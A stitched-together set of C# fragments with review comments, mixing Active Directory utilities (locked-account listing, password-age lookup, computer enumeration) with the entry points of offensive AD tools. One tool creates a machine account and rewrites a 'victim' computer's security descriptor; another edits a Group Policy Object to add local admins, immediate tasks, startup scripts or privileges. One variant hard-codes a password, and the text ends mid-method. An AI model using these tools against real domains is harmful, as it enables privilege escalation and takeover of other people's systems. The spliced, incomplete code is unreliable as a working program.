        /// <summary>
        /// Builds this host's HTTP prefix, registers it on <c>_Listener</c> and starts
        /// accepting requests, mirroring the chosen URI (or the failure reason) into
        /// <c>textBoxListenerURi</c>.
        /// </summary>
        /// <remarks>
        /// The prefix is <c>http://&lt;host&gt;:&lt;_ListenPort&gt;/&lt;ProductName&gt;/</c>. The host
        /// is the machine name, extended with the computer's AD domain when that lookup
        /// succeeds; a failed lookup (not domain-joined, directory unreachable) is a
        /// deliberate best effort and falls back to the short name. Registering an
        /// http.sys prefix on a host name normally needs elevation or a URL ACL, which is
        /// what the failure dialog hints at. The listener is plain HTTP (no TLS).
        /// </remarks>
        private void StartListening()
        {
            string hostName = Environment.MachineName;

            // Best effort: qualify the host name with the computer's domain.
            try
            {
                var computerDomain = System.DirectoryServices.ActiveDirectory.Domain.GetComputerDomain();
                if (!String.IsNullOrEmpty(computerDomain.Name))
                {
                    hostName = $"{hostName}.{computerDomain.Name}";
                }
            }
            catch
            {
                // Not domain-joined or the directory is unavailable: keep the short name.
            }

            string productName = Application.ProductName.ToString();
            _ListenURi = $"http://{hostName}:{_ListenPort}/{productName}/";

            _Listener.Prefixes.Clear();
            _Listener.Prefixes.Add(_ListenURi);
            textBoxListenerURi.Text = _ListenURi;

            try
            {
                _Listener.Start();
                _Listener.BeginGetContext(new AsyncCallback(ListenerCallback), _Listener);
                return;
            }
            catch (Exception ex)
            {
                ReportListenerFailure(ex);
            }

            // Local helper: surface the failure in a dialog and in the URI text box, and
            // clear the advertised URI so nothing else treats the listener as running.
            void ReportListenerFailure(Exception ex)
            {
                System.Windows.Forms.MessageBox.Show("Unable to start HTTP listener" + Environment.NewLine + "(are you running as administrator?)",
                                                     "Error", MessageBoxButtons.OK, MessageBoxIcon.Warning);
                textBoxListenerURi.Text = "FAILED TO START LISTENER: " + ex.Message;
                _ListenURi = "";
                textBoxListenerURi.BackColor = Color.Red;
                textBoxListenerURi.ForeColor = Color.Black;
            }
        }
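        /// <summary>
        /// Prints, one line per account, every object whose <c>lockoutTime</c> still falls
        /// inside the domain's lockout window.
        /// </summary>
        /// <remarks>
        /// Walks every domain in the current forest (printing each name) and keeps a
        /// <see cref="System.DirectoryServices.ActiveDirectory.DirectoryContext"/> for the
        /// LAST one enumerated; that domain's policy and naming context are then searched.
        /// NOTE(review): this preserves the original behaviour, but in a multi-domain forest
        /// the searched domain depends on enumeration order — confirm it is the intended one.
        /// The lockout window comes from <c>DomainPolicy.LockoutDuration</c>: when it is
        /// <see cref="System.TimeSpan.MaxValue"/> (accounts stay locked until an admin unlocks
        /// them) every object with a non-zero lockoutTime is reported; otherwise only those
        /// locked within the last <c>duration</c>. The threshold is computed in UTC because
        /// lockoutTime is a UTC FILETIME, so a local-time subtraction across a DST change
        /// cannot skew the window. All directory handles (forest, domain, root entry,
        /// searcher and result set) are now disposed; the original released only the results.
        /// </remarks>
        public void FindLockedAccounts()
        {
            using (System.DirectoryServices.ActiveDirectory.Forest forest = System.DirectoryServices.ActiveDirectory.Forest.GetCurrentForest())
            {
                System.DirectoryServices.ActiveDirectory.DirectoryContext context = null;
                foreach (System.DirectoryServices.ActiveDirectory.Domain thisDomain in forest.Domains)
                {
                    string domainName = thisDomain.Name;
                    System.Console.WriteLine(domainName);
                    context = new System.DirectoryServices.ActiveDirectory.DirectoryContext(System.DirectoryServices.ActiveDirectory.DirectoryContextType.Domain, domainName);
                } // Next thisDomain

                // Policy and naming context of the (last) selected domain.
                using (System.DirectoryServices.ActiveDirectory.Domain domain = System.DirectoryServices.ActiveDirectory.Domain.GetDomain(context))
                using (System.DirectoryServices.DirectoryEntry root = domain.GetDirectoryEntry())
                {
                    DomainPolicy policy = new DomainPolicy(root);

                    // Default for when accounts stay locked indefinitely: any non-zero lockoutTime.
                    string qry = "(lockoutTime>=1)";

                    System.TimeSpan duration = policy.LockoutDuration;
                    if (duration != System.TimeSpan.MaxValue)
                    {
                        // lockoutTime is stored as a UTC FILETIME; build the threshold in UTC.
                        System.DateTime lockoutThreshold = System.DateTime.UtcNow.Subtract(duration);
                        qry = string.Format(System.Globalization.CultureInfo.InvariantCulture, "(lockoutTime>={0})", lockoutThreshold.ToFileTimeUtc());
                    } // End if (duration != System.TimeSpan.MaxValue)

                    using (System.DirectoryServices.DirectorySearcher ds = new System.DirectoryServices.DirectorySearcher(root, qry))
                    using (System.DirectoryServices.SearchResultCollection src = ds.FindAll())
                    {
                        foreach (System.DirectoryServices.SearchResult sr in src)
                        {
                            long ticks = (long)sr.Properties["lockoutTime"][0];
                            System.Console.WriteLine("{0} locked out at {1}", sr.Properties["name"][0], System.DateTime.FromFileTime(ticks));
                        } // Next sr
                    }     // End Using ds / src
                }         // End Using domain / root
            }             // End Using forest
        }                 // End Sub FindLockedAccounts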
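 /// <summary>
 /// Reads the current domain's <c>maxPwdAge</c> attribute and returns it as a positive duration.
 /// </summary>
 /// <returns>
 /// The maximum password age. AD stores the value as a negative number of 100 ns ticks, so the
 /// magnitude is returned. When the domain uses the "passwords never expire" sentinel
 /// (<see cref="long.MinValue"/>) <see cref="TimeSpan.MaxValue"/> is returned instead.
 /// </returns>
 /// <exception cref="InvalidOperationException">
 /// The base search returned no entry or the entry carries no <c>maxPwdAge</c> attribute.
 /// </exception>
 /// <remarks>
 /// The original returned <c>TimeSpan.MinValue.Duration()</c> when the attribute was missing and
 /// <c>TimeSpan.FromTicks(long.MinValue).Duration()</c> for the never-expire sentinel; both throw
 /// <see cref="OverflowException"/> because the negation is not representable. It also never
 /// disposed the searcher and dereferenced <c>FindOne()</c> without a null check.
 /// </remarks>
 private static TimeSpan GetMaxPasswordAge()
 {
     using (System.DirectoryServices.ActiveDirectory.Domain d = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain())
     using (DirectoryEntry domain = d.GetDirectoryEntry())
     using (DirectorySearcher ds = new DirectorySearcher(domain, "(objectClass=*)", null, SearchScope.Base))
     {
         SearchResult sr = ds.FindOne();
         if (sr == null || !sr.Properties.Contains("maxPwdAge"))
         {
             throw new InvalidOperationException("The domain naming context did not return a maxPwdAge attribute.");
         }

         long ticks = (long)sr.Properties["maxPwdAge"][0];
         if (ticks == long.MinValue)
         {
             // "Never expires" sentinel: cannot be negated, so report an unbounded age.
             return TimeSpan.MaxValue;
         }

         return TimeSpan.FromTicks(ticks).Duration();
     }
 }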
        /// <summary>
        /// Entry point. Parses the command line, fills in domain / domain-controller defaults,
        /// then either runs the cleanup path (<c>SetSecurityDescriptor(..., true)</c>) or creates
        /// a new computer object over LDAP and passes its SID to
        /// <c>SetSecurityDescriptor(..., false)</c>.
        /// </summary>
        /// <param name="args">Raw command-line arguments, handed to <c>CommandLineParser</c>.</param>
        /// <remarks>
        /// NOTE(review): the LDAP connection is never disposed, the SID search filter is built by
        /// concatenating a caller-supplied name, and <c>sid</c> is dereferenced even when that
        /// search returned no entries. Each site is marked inline.
        /// </remarks>
        static void Main(string[] args)
        {
            // NOTE(review): Main normally receives an empty array rather than null, so this guard
            // is unlikely to fire; an args.Length == 0 check is what would show the help text.
            if (args == null)
            {
                PrintHelp();
                return;
            }

            String DomainController   = "";
            String Domain             = "";
            String MachineAccount     = "";
            String DistinguishedName  = "";
            String password_cleartext = "";
            String victimcomputer     = "";

            var Options = new Options();


            if (CommandLineParser.Default.ParseArguments(args, Options))
            {
                // Two accepted modes: create (password + target + account name) or cleanup (cleanup + target).
                if ((!string.IsNullOrEmpty(Options.ComputerPassword) && !string.IsNullOrEmpty(Options.TargetComputer) && !string.IsNullOrEmpty(Options.ComputerAccountName)) || (!string.IsNullOrEmpty(Options.Cleanup) && !string.IsNullOrEmpty(Options.TargetComputer)))
                {
                    if (!string.IsNullOrEmpty(Options.DomainController))
                    {
                        DomainController = Options.DomainController;
                    }
                    if (!string.IsNullOrEmpty(Options.Domain))
                    {
                        Domain = Options.Domain;
                    }
                    if (!string.IsNullOrEmpty(Options.ComputerAccountName))
                    {
                        MachineAccount = Options.ComputerAccountName;
                    }
                    if (!string.IsNullOrEmpty(Options.ComputerPassword))
                    {
                        password_cleartext = Options.ComputerPassword;
                    }
                    if (!string.IsNullOrEmpty(Options.TargetComputer))
                    {
                        victimcomputer = Options.TargetComputer;
                    }
                }
                else
                {
                    Console.Write("[!] Missing required arguments! Exiting...\n");
                    //PrintHelp();
                    return;
                }
            }
            else
            {
                Console.Write("[!] Missing required arguments! Exiting...\n");
                PrintHelp();
                return;
            }

            // Raw option value; compared literally against "true" further down.
            String cleanup = Options.Cleanup;

            // If a domain controller and domain were not provide try to find them automatically
            // (current_domain is only fetched when at least one of them is missing, and only
            // read under the same conditions, so it cannot be null where it is used).
            System.DirectoryServices.ActiveDirectory.Domain current_domain = null;
            if (DomainController == String.Empty || Domain == String.Empty)
            {
                try
                {
                    current_domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain();
                }
                catch
                {
                    Console.WriteLine("[!] Cannot enumerate domain.\n");
                    return;
                }
            }

            if (DomainController == String.Empty)
            {
                DomainController = current_domain.PdcRoleOwner.Name;
            }

            if (Domain == String.Empty)
            {
                Domain = current_domain.Name;
            }

            // NOTE(review): culture-sensitive lower-casing; ToLowerInvariant() is the safer
            // choice for a value that becomes part of an LDAP DN and an SPN.
            Domain = Domain.ToLower();

            // Normalise the account name: machine_account is the bare name, sam_account has the trailing '$'.
            String machine_account = MachineAccount;
            String sam_account     = "";

            if (MachineAccount.EndsWith("$"))
            {
                sam_account     = machine_account;
                machine_account = machine_account.Substring(0, machine_account.Length - 1);
            }
            else
            {
                sam_account = machine_account + "$";
            }


            String distinguished_name        = DistinguishedName;
            String victim_distinguished_name = DistinguishedName;

            String[] DC_array = null;

            // distinguished_name becomes CN=<account>,CN=Computers,DC=...; victim_distinguished_name
            // ends up as only the DC= components (the domain root DN), not the target object's DN —
            // presumably SetSecurityDescriptor searches from that base; verify against that method.
            distinguished_name        = "CN=" + machine_account + ",CN=Computers";
            victim_distinguished_name = "";
            DC_array = Domain.Split('.');

            foreach (String DC in DC_array)
            {
                distinguished_name        += ",DC=" + DC;
                victim_distinguished_name += ",DC=" + DC;
            }
            victim_distinguished_name = victim_distinguished_name.TrimStart(',');


            //this check is lame but cannot make the switch work with CommandLine :)
            // Ordinal, case-sensitive: only the literal "true" selects cleanup; any other
            // non-null value is rejected just below.
            if (cleanup == "true")
            {
                SetSecurityDescriptor(Domain, victim_distinguished_name, victimcomputer, null, true);
                return;
            }

            if (cleanup != null)
            {
                Console.WriteLine("Cleanup must be set to \"true\"\n. Exiting...");
                return;
            }

            Console.WriteLine("[+] Domain = " + Domain);
            Console.WriteLine("[+] Domain Controller = " + DomainController);
            Console.WriteLine("[+] New SAMAccountName = " + sam_account);
            Console.WriteLine("[+] Distinguished Name = " + distinguished_name);

            // Plain LDAP on 389; sealing + signing are requested before Bind, so the session is
            // encrypted and integrity-protected. Bind() takes no credential here, so it
            // presumably uses the caller's current security context.
            System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
            System.DirectoryServices.Protocols.LdapConnection          connection = null;

            connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);

            connection.SessionOptions.Sealing = true;
            connection.SessionOptions.Signing = true;
            connection.Bind();

            // unicodePwd must be the UTF-16LE bytes of the password wrapped in double quotes;
            // userAccountControl 4096 is WORKSTATION_TRUST_ACCOUNT.
            var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
                new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
                new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
                new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
                new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + password_cleartext + "\"")),
                new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
                new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
            });

            // NOTE(review): `connection` is IDisposable and is never disposed on any path
            // (success, this catch, or the early returns below); wrap it in a using block.
            try
            {
                connection.SendRequest(request);
                Console.WriteLine("[+] Machine account " + machine_account + " added");
            }
            catch (System.Exception ex)
            {
                // The trailing ')' in this message is a typo.
                Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-MachineAccountQuota limit.)");
                Console.WriteLine("[-] Exception: " + ex.Message);
                return;
            }

            // Get SID of the new computer object
            // NOTE(review): the filter embeds machine_account unescaped; a name containing LDAP
            // filter metacharacters ('*', '(', ')', '\') changes the query. Escape it per RFC 4515.
            var new_request        = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
            var new_response       = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
            SecurityIdentifier sid = null;

            // A return inside the catch leaves Main, not just the loop.
            foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
            {
                try
                {
                    sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
                    Console.Out.WriteLine("[+] SID of New Computer: " + sid.Value);
                }
                catch
                {
                    Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
                    return;
                }
            }

            // NOTE(review): when Entries is empty, sid is still null and sid.Value throws
            // NullReferenceException; guard with `if (sid == null) return;` first.
            SetSecurityDescriptor(Domain, victim_distinguished_name, victimcomputer, sid.Value, false);
        }
        /// <summary>
        /// Entry point for the GPO-editing tool: validates the options for the requested action,
        /// fills in domain / domain-controller defaults, builds the DN of the domain's
        /// <c>CN=Policies,CN=System</c> container and dispatches to <c>NewLocalAdmin</c>,
        /// <c>NewImmediateTask</c>, <c>NewStartupScript</c> or <c>AddNewRights</c>.
        /// </summary>
        /// <param name="args">Raw command-line arguments, handed to <c>CommandLineParser</c>.</param>
        /// <remarks>
        /// NOTE(review): two logic defects are marked inline — the "one action at a time" guard
        /// only fires when all four flags are set, and <c>current_domain</c> is dereferenced
        /// without being fetched when only the domain controller is left unspecified.
        /// </remarks>
        static void Main(string[] args)
        {
            // NOTE(review): Main normally receives an empty array rather than null; the
            // args.Length == 0 case is handled after parsing below.
            if (args == null)
            {
                PrintHelp();
                return;
            }

            // Whitelist of logon-right / privilege names accepted by --UserRights; matched
            // case-sensitively (ordinal) further down.
            String[] user_rights_list =
            {
                "SeTrustedCredManAccessPrivilege",
                "SeNetworkLogonRight",
                "SeTcbPrivilege",
                "SeMachineAccountPrivilege",
                "SeIncreaseQuotaPrivilege",
                "SeInteractiveLogonRight",
                "SeRemoteInteractiveLogonRight",
                "SeBackupPrivilege",
                "SeChangeNotifyPrivilege",
                "SeSystemtimePrivilege",
                "SeTimeZonePrivilege",
                "SeCreatePagefilePrivilege",
                "SeCreateTokenPrivilege",
                "SeCreateGlobalPrivilege",
                "SeCreatePermanentPrivilege",
                "SeCreateSymbolicLinkPrivilege",
                "SeDebugPrivilege",
                "SeDenyNetworkLogonRight",
                "SeDenyBatchLogonRight",
                "SeDenyServiceLogonRight",
                "SeDenyInteractiveLogonRight",
                "SeDenyRemoteInteractiveLogonRight",
                "SeEnableDelegationPrivilege",
                "SeRemoteShutdownPrivilege",
                "SeAuditPrivilege",
                "SeImpersonatePrivilege",
                "SeIncreaseWorkingSetPrivilege",
                "SeIncreaseBasePriorityPrivilege",
                "SeLoadDriverPrivilege",
                "SeLockMemoryPrivilege",
                "SeBatchLogonRight",
                "SeServiceLogonRight",
                "SeSecurityPrivilege",
                "SeRelabelPrivilege",
                "SeSystemEnvironmentPrivilege",
                "SeManageVolumePrivilege",
                "SeProfileSingleProcessPrivilege",
                "SeSystemProfilePrivilege",
                "SeUndockPrivilege",
                "SeAssignPrimaryTokenPrivilege",
                "SeRestorePrivilege",
                "SeShutdownPrivilege",
                "SeSyncAgentPrivilege",
                "SeTakeOwnershipPrivilege"
            };

            // Passed through unchanged to NewLocalAdmin / NewImmediateTask; its meaning is defined there.
            bool Force = false;

            String Domain           = "";
            String DomainController = "";
            String UserAccount      = "";
            String GPOName          = "";

            String task_name        = "";
            String author           = "";
            String arguments        = "";
            String command          = "";
            bool   AddLocalAdmin    = false;
            bool   AddImmediateTask = false;

            String ScriptContents   = "";
            String ScriptName       = "";
            bool   AddStartupScript = false;

            bool AddUserRights = false;

            String[] user_rights = null;

            var Options = new Options();

            if (CommandLineParser.Default.ParseArguments(args, Options))
            {
                if (args.Length == 0)
                {
                    PrintHelp();
                    return;
                }

                if (Options.Help == true)
                {
                    PrintHelp();
                    return;
                }
                // check that only one attack was specified
                // NOTE(review): with && this guard only fires when all four flags are set, so two
                // or three set together pass through and each selected action then runs in turn
                // at the bottom. Count the true flags and reject when the count exceeds one.
                if (((Options.AddLocalAdmin && Options.AddImmediateTask) && Options.AddUserRights) && Options.AddStartupScript)
                {
                    Console.WriteLine("[!] You can only specify one attack at a time.\n[-] Exiting\n");
                    return;
                }

                //check that the name of the GPO to edit was provided
                if (string.IsNullOrEmpty(Options.GpoName))
                {
                    Console.Write("[!] You need to provide the name of the GPO to edit.\n[!] Exiting...\n");
                    return;
                }
                GPOName = Options.GpoName;

                // check that the necessary options for adding a new local admin were provided
                if (Options.AddLocalAdmin)
                {
                    AddLocalAdmin = true;
                    if (string.IsNullOrEmpty(Options.UserAccount))
                    {
                        Console.WriteLine("[!] To add a new local admin the following options are needed:\n\t--UserAccount\n\n[-] Exiting...");
                        return;
                    }
                    UserAccount = Options.UserAccount;
                }

                // check that the necessary options for adding a new startup script were provided
                if (Options.AddStartupScript)
                {
                    AddStartupScript = true;
                    if (string.IsNullOrEmpty(Options.ScriptName))
                    {
                        Console.WriteLine("[!] To add a new startup script the following options are needed:\n\t--ScriptName\n\t--ScriptContents\n\n[-] Exiting...");
                        return;
                    }
                    if (string.IsNullOrEmpty(Options.ScriptContents))
                    {
                        Console.WriteLine("[!] To add a new startup script the following options are needed:\n\t--ScriptName\n\t--ScriptContents\n\n[-] Exiting...");
                        return;
                    }
                    ScriptContents = Options.ScriptContents;
                    ScriptName     = Options.ScriptName;
                }

                //check that the necessary options for adding a new scheduled task were provided
                if (Options.AddImmediateTask)
                {
                    AddImmediateTask = true;
                    if (string.IsNullOrEmpty(Options.TaskName) || string.IsNullOrEmpty(Options.Author) || string.IsNullOrEmpty(Options.Arguments) || string.IsNullOrEmpty(Options.Command))
                    {
                        Console.WriteLine("[!] To add a new immediate task the following options are needed:\n\t--Author\n\t--TaskName\n\t--Arguments\n\t--Command\n\n[-] Exiting...");
                        return;
                    }
                    task_name = Options.TaskName;
                    author    = Options.Author;
                    arguments = Options.Arguments;
                    command   = Options.Command;
                }

                // check that the necessary options for adding new rights were provided
                if (Options.AddUserRights)
                {
                    AddUserRights = true;
                    if ((string.IsNullOrEmpty(Options.UserAccount)) || string.IsNullOrEmpty(Options.UserRights))
                    {
                        Console.WriteLine("[!] To add user rights the following options are needed:\n\t--UserAccount\n\t--UserRights\n[-] Exiting...");
                        return;
                    }

                    UserAccount = Options.UserAccount;
                    // Comma-separated list; entries are not trimmed, so "a, b" would fail validation on " b".
                    user_rights = Options.UserRights.Split(',');

                    // check if the rights passed as arguments are valid
                    // Enumerable.Contains with the default string comparer is ordinal, hence the
                    // "case sensitive" wording in the message.
                    foreach (string p in user_rights)
                    {
                        if (!user_rights_list.Contains(p))
                        {
                            Console.WriteLine("\n[!] The user rights provided were not valid. Rights are case sensitive!\n[!] Exiting...");
                            return;
                        }
                    }
                }

                if (!string.IsNullOrEmpty(Options.DomainController))
                {
                    DomainController = Options.DomainController;
                }
                if (!string.IsNullOrEmpty(Options.Domain))
                {
                    Domain = Options.Domain;
                }
                if (Options.Force)
                {
                    Force = true;
                }
            }
            else
            {
                Console.Write("[!] Unknown argument error.\n[!] Exiting...\n");
                return;
            }

            // NOTE(review): current_domain is only fetched when Domain is empty, yet it is also
            // read to default DomainController. Supplying --Domain without --DomainController
            // therefore leaves it null and the PdcRoleOwner access below throws
            // NullReferenceException. Fetch it when either value is empty instead.
            System.DirectoryServices.ActiveDirectory.Domain current_domain = null;
            if (string.IsNullOrEmpty(Domain))
            {
                try
                {
                    current_domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain();
                }
                catch
                {
                    Console.WriteLine("[!] Cannot enumerate domain.\n");
                    return;
                }
            }

            if (string.IsNullOrEmpty(DomainController))
            {
                DomainController = current_domain.PdcRoleOwner.Name;
            }

            if (string.IsNullOrEmpty(Domain))
            {
                Domain = current_domain.Name;
            }

            String[] DC_array           = null;
            String   distinguished_name = null;

            // DN of the domain's Group Policy container: CN=Policies,CN=System,DC=...
            distinguished_name = "CN=Policies,CN=System";
            DC_array           = Domain.Split('.');

            foreach (String DC in DC_array)
            {
                distinguished_name += ",DC=" + DC;
            }
            // Lower-cased only after the split, so the DC= components above keep the caller's
            // casing. NOTE(review): ToLowerInvariant() avoids culture-dependent results.
            Domain = Domain.ToLower();

            Console.WriteLine("[+] Domain = " + Domain);
            Console.WriteLine("[+] Domain Controller = " + DomainController);
            Console.WriteLine("[+] Distinguished Name = " + distinguished_name);

            // Add new local admin
            // Only this action is wrapped in try/catch; the three below let exceptions propagate.
            if (AddLocalAdmin)
            {
                try
                {
                    NewLocalAdmin(UserAccount, Domain, DomainController, GPOName, distinguished_name, Force);
                }
                catch (System.Exception ex)
                {
                    Console.WriteLine(ex.Message + "[!] Exiting...");
                    return;
                }
            }

            // Add new scheduled task
            if (AddImmediateTask)
            {
                NewImmediateTask(Domain, DomainController, GPOName, distinguished_name, task_name, author, arguments, command, Force);
            }

            // Add new startup script
            if (AddStartupScript)
            {
                NewStartupScript(ScriptName, ScriptContents, Domain, DomainController, GPOName, distinguished_name);
            }

            // Add rights to user account
            if (AddUserRights)
            {
                AddNewRights(Domain, DomainController, GPOName, distinguished_name, user_rights, UserAccount);
            }
        }
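        /// <summary>
        /// Entry point: prints the binding data produced by <c>GetCsvData</c> either for the single
        /// host named in <c>args[0]</c> or, with no arguments, for every computer object in the
        /// current AD domain.
        /// </summary>
        /// <param name="args">Optional; <c>args[0]</c> is the host to query. Null or empty enumerates the domain.</param>
        /// <remarks>
        /// In enumeration mode each computer is pinged first; hosts that cannot be resolved or do not
        /// answer are reported as not accessible and skipped. Every directory handle is released via
        /// <c>using</c>, including the result set returned by <c>FindAll()</c> and each
        /// <c>GetDirectoryEntry()</c>, which the original never disposed. The "CN=" prefix test is
        /// ordinal rather than culture-sensitive.
        /// </remarks>
        public static void Main(string[] args)
        {
            // Single-host mode.
            if (args != null && args.Length > 0)
            {
                string host        = args[0];
                string outbindings = GetCsvData(host);
                Console.WriteLine(outbindings);
                return;
            }

            // Domain mode: collect the CN of every computer object first, then probe each one.
            List<string> computerNames = new List<string>();
            using (System.DirectoryServices.ActiveDirectory.Domain domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain())
            using (DirectoryEntry entry = new DirectoryEntry("LDAP://" + domain.ToString()))
            using (DirectorySearcher searcher = new DirectorySearcher(entry))
            {
                searcher.Filter    = "(objectClass=computer)";
                searcher.SizeLimit = int.MaxValue;
                // A non-zero PageSize enables paged results so the server's size limit does not truncate the list.
                searcher.PageSize  = int.MaxValue;

                // FindAll() holds an unmanaged search handle until disposed.
                using (var results = searcher.FindAll())
                {
                    foreach (SearchResult result in results)
                    {
                        using (var computerEntry = result.GetDirectoryEntry())
                        {
                            string computerName = computerEntry.Name;
                            if (computerName.StartsWith("CN=", StringComparison.Ordinal))
                            {
                                computerName = computerName.Substring("CN=".Length);
                            }
                            computerNames.Add(computerName);
                        }
                    }
                }
            }

            foreach (string computer in computerNames)
            {
                Console.WriteLine("Getting bindings for " + computer + ":");
                Console.WriteLine("");

                if (IsReachable(computer))
                {
                    Console.WriteLine(GetCsvData(computer));
                }
                else
                {
                    Console.WriteLine("Computer not accessible");
                }
                Console.WriteLine("");
                Console.WriteLine("");
            }
        }

        /// <summary>Sends one ICMP echo to <paramref name="host"/> and reports whether it answered.</summary>
        /// <param name="host">Host name taken from the computer object's CN.</param>
        /// <returns><c>true</c> only when the reply status is <see cref="IPStatus.Success"/>.</returns>
        /// <remarks>
        /// Any failure to send (most often name resolution) prints "No DNS" and counts as unreachable.
        /// The original pinged localhost in that case purely to obtain a non-null reply object; that
        /// extra request is dropped. The catch stays broad on purpose: one bad host name must not
        /// abort the whole enumeration.
        /// </remarks>
        private static bool IsReachable(string host)
        {
            using (var ping = new Ping())
            {
                try
                {
                    return ping.Send(host).Status == IPStatus.Success;
                }
                catch (Exception)
                {
                    Console.WriteLine("No DNS");
                    return false;
                }
            }
        }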
        /// <summary>
        /// Test-harness variant of the machine-account creation entry point: the same flow as the
        /// option-driven version, but with the account name and password hard-coded and no
        /// follow-up call after the LDAP add.
        /// </summary>
        /// <param name="args">Unused.</param>
        /// <remarks>
        /// NOTE(review): a clear-text credential lives in source here; even for a throwaway test
        /// account it ends up in version control and in the binary. Read it from the environment
        /// or prompt for it. The LDAP connection is also never disposed.
        /// </remarks>
        static void Main(string[] args)
        {
            // DomainController and Domain are always empty in this variant, so both are resolved
            // from the current domain below.
            String DomainController   = "";
            String Domain             = "";
            String MachineAccount     = "testNew";
            String DistinguishedName  = "";
            // NOTE(review): hard-coded secret — see the remarks above.
            String password_cleartext = "123456789";

            // current_domain is fetched whenever either value is empty and only read under the
            // same conditions, so it cannot be null where it is used.
            System.DirectoryServices.ActiveDirectory.Domain current_domain = null;
            if (DomainController == String.Empty || Domain == String.Empty)
            {
                try
                {
                    current_domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain();
                }
                catch
                {
                    Console.WriteLine("[!] Cannot enumerate domain.\n");
                    return;
                }
            }

            if (DomainController == String.Empty)
            {
                DomainController = current_domain.PdcRoleOwner.Name;
            }

            if (Domain == String.Empty)
            {
                Domain = current_domain.Name;
            }

            // NOTE(review): culture-sensitive lower-casing; ToLowerInvariant() is safer for a
            // value that becomes part of a DN and an SPN.
            Domain = Domain.ToLower();

            // machine_account is the bare name, sam_account carries the trailing '$'.
            String machine_account = MachineAccount;
            String sam_account     = "";

            if (MachineAccount.EndsWith("$"))
            {
                sam_account     = machine_account;
                machine_account = machine_account.Substring(0, machine_account.Length - 1);
            }
            else
            {
                sam_account = machine_account + "$";
            }


            String distinguished_name        = DistinguishedName;
            // Built up in the loop below but never read afterwards in this variant.
            String victim_distinguished_name = DistinguishedName;

            String[] DC_array = null;

            // CN=<account>,CN=Computers,DC=... (one DC= component per label of the domain name).
            distinguished_name = "CN=" + machine_account + ",CN=Computers";
            DC_array           = Domain.Split('.');

            foreach (String DC in DC_array)
            {
                distinguished_name        += ",DC=" + DC;
                victim_distinguished_name += ",DC=" + DC;
            }

            Console.WriteLine("[+] Domain = " + Domain);
            Console.WriteLine("[+] Domain Controller = " + DomainController);
            Console.WriteLine("[+] New SAMAccountName = " + sam_account);
            Console.WriteLine("[+] Distinguished Name = " + distinguished_name);

            // Plain LDAP on 389; sealing + signing are requested before Bind, so the session is
            // encrypted and integrity-protected. Bind() takes no credential, so it presumably
            // uses the caller's current security context.
            System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
            System.DirectoryServices.Protocols.LdapConnection          connection = null;

            connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);

            connection.SessionOptions.Sealing = true;
            connection.SessionOptions.Signing = true;
            connection.Bind();

            // unicodePwd must be the UTF-16LE bytes of the password wrapped in double quotes;
            // userAccountControl 4096 is WORKSTATION_TRUST_ACCOUNT.
            var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
                new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
                new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
                new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
                new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + password_cleartext + "\"")),
                new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
                new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
            });

            // NOTE(review): `connection` is IDisposable and is never disposed on either path;
            // wrap it in a using block.
            try
            {
                connection.SendRequest(request);
                Console.WriteLine("[+] Machine account " + machine_account + " added");
            }
            catch (System.Exception ex)
            {
                // The trailing ')' in this message is a typo.
                Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-MachineAccountQuota limit.)");
                Console.WriteLine("[-] Exception: " + ex.Message);
                return;
            }
        }
        /// <summary>
        /// Entry point. Parses "/key:value" style arguments, resolves the target domain and
        /// domain controller (from the arguments or from the current machine's domain), creates
        /// a new computer object over LDAP with the supplied password and SPNs, reads back that
        /// object's SID, and passes the SID to <c>SetSecurityDescriptor</c> for the object named
        /// by /computer. When /cleanup is present only the cleanup path of
        /// <c>SetSecurityDescriptor</c> runs. Every failure is reported on the console; the
        /// outer catch means this method does not propagate exceptions.
        /// </summary>
        /// <param name="args">Command-line arguments of the form /name:value. Fewer than two prints usage.</param>
        static void Main(string[] args)
        {
            try
            {
                if (args.Length < 2)
                {
                    Usage();
                    return;
                }
